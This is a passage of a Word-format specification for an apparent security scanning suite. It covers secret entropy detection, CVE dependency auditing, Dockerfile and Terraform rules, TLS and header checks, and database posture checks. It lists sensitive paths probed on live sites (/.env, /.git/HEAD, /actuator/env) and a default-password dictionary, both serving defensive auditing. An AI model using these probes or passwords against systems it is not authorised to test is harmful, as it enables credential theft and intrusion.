        <w:t>To identify unclassified high-randomness tokens (such as Base64-encoded keys, hex digests, or custom proprietary tokens), the scanner calculates the Shannon Entropy of string tokens with length $\ge 24$:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>$$H(X) = -\sum_{i=1}^{n} P(x_i) \log_2 P(x_i)$$</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Where $P(x_i)$ is the probability of character $x_i$ appearing in the string.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Default threshold: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>4.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (configurable via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SHIELDCI_ENTROPY_THRESHOLD</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Strings exceeding this threshold without matching comment lines are flagged as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>MEDIUM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> severity suspected private tokens.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
        </w:rPr>
        <w:t>Redaction &amp; Masking Guarantees</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>To prevent secondary exposure in scan reports, logs, and Webhook payloads, matched secret values are masked:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Only the first 4 and last 4 characters are preserved (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>AKIA****12AB</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2563EB"/>
        </w:rPr>
        <w:t>3. Software Composition Analysis (`SCAScanner`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Parses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manifests to generate software bill-of-materials (SBOM) inventories and audit against known CVE records.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
        </w:rPr>
        <w:t>SBOM Inventory Generation (PURL)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>For every pinned dependency, the scanner outputs a standard Package URL (PURL) conforming to the PURL specification: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"name": "requests",</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "version": "2.28.1",</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "purl": "pkg:pypi/requests@2.28.1",</w:t>
              <w:br/>
              <w:t xml:space="preserve">  "file": "requirements.txt"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Advisory CVE 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Affected Max Version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CVE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CVSS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Vulnerability Title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requests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2.31.0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CVE-2023-32681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MEDIUM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6.1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Proxy-Authorization Header Leak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urllib3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1.26.17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CVE-2023-45803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7.5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HTTP Request Smuggling &amp; Stream Exposure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pyyaml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5.3.1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CVE-2020-14343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CRITICAL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9.8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Arbitrary Code Execution via </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B4283C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>load()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flask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2.2.0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CVE-2023-30861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7.5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Session Cookie Exposure via Cache-Control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django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4.2.0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CVE-2023-3111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8.1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Open Redirect and DoS in Login URLs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Semantic Versioning Evaluation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Versions are parsed into integer tuples (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>[int(p) for p in ver.split(".")]</w:t>
      </w:r>
      <w:r>
        <w:t>) and compared directly against maximum vulnerable thresholds to avoid false positives on alpha or patch releases.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2563EB"/>
        </w:rPr>
        <w:t>4. Container &amp; IaC Scanner (`IaCScanner`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Evaluates Dockerfiles (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Dockerfile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>*.dockerfile</w:t>
      </w:r>
      <w:r>
        <w:t>) and Terraform configurations (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>*.tf</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
        </w:rPr>
        <w:t>Dockerfile Rule IAC-001: Unpinned `:latest` Base Image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MEDIUM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Detection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> directives specifying </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:latest</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> or lacking an explicit tag.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Introduces unpredictable upstream dependencies into builds, invalidating build reproducibility and introducing unexpected supply chain vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
        </w:rPr>
        <w:t>Dockerfile Rule IAC-002: Container Execution as Root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Detection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Analyzes the entire Dockerfile for a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>USER &lt;non-root&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> instruction.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Running containers as default UID 0 (root) allows container escape exploits to achieve root privileges on the underlying host kernel.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Auto-Fix</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Injects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before the runtime entrypoint in 1-click patches.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
        </w:rPr>
        <w:t>Dockerfile Rule IAC-003: Exposed Administrative Ports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Detection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>EXPOSE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> directives declaring ports </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (SSH), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>3389</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (RDP), or </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>23</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Telnet).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Production containers should be managed via container orchestration control planes (Kubernetes, ECS), not interactive SSH daemons.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
        </w:rPr>
        <w:t>Terraform Rule IAC-004: Unrestricted Ingress CIDR (0.0.0.0/0)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Detection</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Searches for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>cidr_blocks = ["0.0.0.0/0"]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> inside security group ingress blocks.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Exposes infrastructure ports to the open internet without IP restriction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2563EB"/>
        </w:rPr>
        <w:t>5. Live Web Perimeter &amp; API Scanner (`WebsiteScanner`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Executes non-destructive audits against live web applications and API endpoints.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
        </w:rPr>
        <w:t>SSL/TLS Certificate Auditing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Establishes a socket connection on port 443 and inspects the peer certificate:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Expired Certificates</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Flags certificates where </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>notAfter &lt; now()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>CRITICAL</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Imminent Expiration</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Flags certificates expiring within $\le 14$ days as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>HIGH</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Deprecated TLS Protocols</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Negotiates supported protocol versions. Flags </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>TLSv1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>TLSv1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SSLv2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SSLv3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>HIGH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (vulnerable to POODLE, BEAST).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted Certificates</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Catches </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SSLCertVerificationError</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (self-signed, untrusted CA, invalid hostname).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
        </w:rPr>
        <w:t>Security Response Headers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Expected Setting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Severity if Missing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Protection Mechanism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Strict-Transport-Security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max-age=31536000; includeSubDomains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Prevents SSL stripping and cookie interception over plaintext HTTP.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Content-Security-Policy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Strict script-src / object-src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Mitigates Cross-Site Scripting (XSS) and data injection.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X-Frame-Options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DENY</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> or </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B4283C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>SAMEORIGIN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Defends against Clickjacking framing attacks.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X-Content-Type-Options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nosniff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Prevents MIME-type sniffing by legacy browsers.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Referrer-Policy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strict-origin-when-cross-origin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Prevents token and URL leakage in HTTP </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="B4283C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Referer</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> headers.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Additionally flags `Content-Security-Policy` containing `'unsafe-inline'` or `'unsafe-eval'` as `MEDIUM` severity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
        </w:rPr>
        <w:t>CORS Wildcard with Credentials</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40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  <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Condition</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Access-Control-Allow-Origin: *</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AND </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Access-Control-Allow-Credentials: true</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Risk</w:t>
      </w:r>
      <w:r>
        <w:t>: Allows any malicious third-party website to make authenticated requests and read sensitive responses on behalf of a logged-in user.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
        </w:rPr>
        <w:t>Information Disclosure &amp; Banners</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Server Version Disclosure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Flags </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> headers containing numeric version strings (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Apache/2.4.41</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>LOW</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Framework Disclosure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Flags </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>X-Powered-By</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> headers (e.g. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Express</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>PHP/7.4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>LOW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Active Sensitive Path Probes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Performs non-intrusive </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> requests against high-risk paths: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/.env</w:t>
      </w:r>
      <w:r>
        <w:t>: Validates whether the response contains configuration key/value pairs (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>APP_</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>DB_</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w: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/.git/HEAD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Validates whether the response contains </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ref: refs/heads/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/actuator/env</w:t>
      </w:r>
      <w:r>
        <w:t>: Validates Spring Boot actuator environment variable exposure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2563EB"/>
        </w:rPr>
        <w:t>6. Database Posture &amp; Access Scanner (`DatabaseScanner`)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Audits connection strings and live datastores across PostgreSQL, MySQL, MariaDB, Redis, MongoDB, Elasticsearch, and MSSQL.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
        </w:rPr>
        <w:t>Connection String Credential Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Identifies hardcoded passwords inside connection URIs (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>scheme://user:password@host:port/db</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Masks passwords in output reports (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>scheme://user:****@host:port/db</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="160" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="475569"/>
        </w:rPr>
        <w:t>Weak &amp; Default Password Detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t>Compares provided credentials against a known weak dictionary:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="B4283C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>{"root", "admin", "password", "123456", "postgres", "guest", "test", "toor", "default"}</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:before="20" w:after="40"/>
      </w:pPr>
      <w:r>
